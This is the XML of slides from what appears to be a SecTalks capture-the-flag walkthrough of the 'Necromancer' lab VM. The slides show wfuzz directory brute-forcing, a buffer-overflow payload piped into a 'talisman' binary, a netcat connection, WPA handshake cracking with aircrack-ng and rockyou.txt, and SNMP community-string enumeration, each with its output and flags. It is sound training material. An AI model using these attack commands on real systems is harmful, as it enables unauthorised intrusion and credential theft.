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59" r:id="rId25"/>
    <p:sldId id="261" r:id="rId26"/>
    <p:sldId id="262" r:id="rId27"/>
    <p:sldId id="263" r:id="rId28"/>
    <p:sldId id="264" r:id="rId29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1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95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A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40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9814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220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1260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44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4422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300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709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27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" name="Shape 112"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"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					      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fuzz.py" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.56.101/amagicbridgeappearsatthechasm/FUZZ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sectalkscfp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paces.com/sectalks/join" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sectalks/sectalks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872717" y="1122744"/>
            <a:ext cx="3954714" cy="51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31" y="1122744"/>
            <a:ext cx="3954714" cy="51922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533703" y="1975606"/>
            <a:ext cx="4974121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____           _____     _ _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 ___|  ___  __|_   _|_ _| | | _____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\___ \ / _ \/ __|| |/ _` | | |/ / __|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___) |  __/ (__ | | (_| | |   &lt;\__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|____/ \___|\___||_|\__,_|_|_|\_\___/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89" name="Shape 89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="3718892"/>
            <a:ext cx="6096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  </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="18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60" y="483233"/>
            <a:ext cx="1881039" cy="356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uzz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the webpage and find the hidden directory on the webpage, using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the 10k_most_common.txt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nidogski:wfuzz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nidogski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ python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wfuzz.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -c -z file,/Users/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nidogski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/Desktop/necromancer/10k_most_common.txt --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 404 -R 1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http://192.168.56.101/amagicbridgeappearsatthechasm/FUZZ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********************************************************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Wfuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 2.1.3 - The Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bruteforcer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                      *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********************************************************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Target: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http://192.168.56.101/amagicbridgeappearsatthechasm/FUZZ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Total requests: 10000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==================================================================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ID Response   Lines      Word         Chars          Request  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==================================================================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05906:  C=200      9 L     109 W   9676 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>talisman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Total </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>time: 13.86856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Processed Requests: 10000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Filtered Requests: 9997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Requests/sec.: 721.0549</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" b="0" i="0" u="none" strike="noStrike" cap="none" baseline="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191811714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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -al Downloads/talisman</a:t>
            </a:r>
          </a:p>
          <a:p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rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-r--r--@ 1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  staff  9676 17 Nov 19:05 Downloads/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>talisman</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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file Downloads/talisman</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Downloads/talisman: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, not stripped</a:t>
            </a:r>
          </a:p>
          <a:p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</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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32808407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USE THE PDF FOR AN INTRO TO BINARIES:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mnt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hgfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/Desktop/necromancer# python -c 'print "A"*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> + "\x37\x8a\x04\x08"' | ./talisman </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You have found a talisman. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The talisman is cold to the touch, and has no words or symbols on it's surface. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do you want to wear the talisman?   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nothing happens. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You fall to your knees.. weak and weary. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Looking up you can see the spell is still protecting the cave entrance. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The talisman is now almost too hot to touch! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Turning it over you see words now etched into the surface: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flag4{ea50536158db50247e110a6c89fcf3d3} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chant these words at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>u31337 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Segmentation fault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19878609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nidogski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nidogski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -4u 192.168.56.101 31337</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lackmagic</a:t>
            </a:r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As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>you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chant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words</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hissing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sound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echoes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from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ice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>walls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r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blue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> aura </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>disappears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from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cave </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>entrance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You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enter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cave and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>see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that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it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is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dimly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lit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by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torches</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shadows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dancing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against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rock </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>you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descend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deeper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deeper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into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mountain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>snip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Looking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towards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one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of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torches</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>you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see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something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on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cave </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You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walk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closer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>notice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a pile of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mutilated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bats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lying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on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cave </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>floor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Above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them</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>word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etched</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>blood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on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the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wall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r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rgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>thenecromancerwillabsorbyoursoul</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00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rgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flag5{0766c36577af58e15545f099a3b15e60}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8295582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2" name="Picture 1" descr="Screen Shot 2016-12-15 at 1.45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82" y="1710450"/>
            <a:ext cx="5875978" cy="47847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419317" y="3667103"/>
            <a:ext cx="3201088" cy="11143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751065" y="2160884"/>
            <a:ext cx="3201088" cy="11143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7558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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unarchiving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file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>necromancer.cap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</a:rPr>
              <a:t>necromancer.cap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tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> capture file (little-endian) - version 2.4 (802.11, capture length 65535)</a:t>
            </a:r>
          </a:p>
          <a:p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Can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wpaclean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to get the 4-way handshake hash out of it…or use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> directly: </a:t>
            </a:r>
          </a:p>
          <a:p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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aircrack-ng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necromancer.cap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -w /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/share/wordlists/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rockyou.txt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Opening </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>necromancer.cap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Read 2197 packets. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   #  BSSID              ESSID                     Encryption </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   1  C4:12:F5:0D:5E:95  community                 WPA (1 handshake) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Choosing first network as target.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Reading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>packets, please wait... </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="8"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>KEY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FOUND! [ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>death2all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ]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24776425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you have the SNMP community name, death2all, can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>snmpwalk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enumerate more info: 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en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>snmpwalk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -v2c -On -c death2all 192.168.56.101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.1.3.6.1.2.1.1.1.0 = STRING: "You stand in front of a door."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.1.3.6.1.2.1.1.4.0 = STRING: "The door is Locked. If you choose to defeat me, the door must be Unlocked."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.1.3.6.1.2.1.1.5.0 = STRING: "Fear the Necromancer!"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.1.3.6.1.2.1.1.6.0 = STRING: "Locked - death2allrw!"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.1.3.6.1.2.1.1.6.0 = No more variables left in this MIB View (It is past the end of the MIB tree) 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gives away another SNMP name, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>death2allrw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>….LOADS of info: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420492572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en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>snmpwalk</a:t>
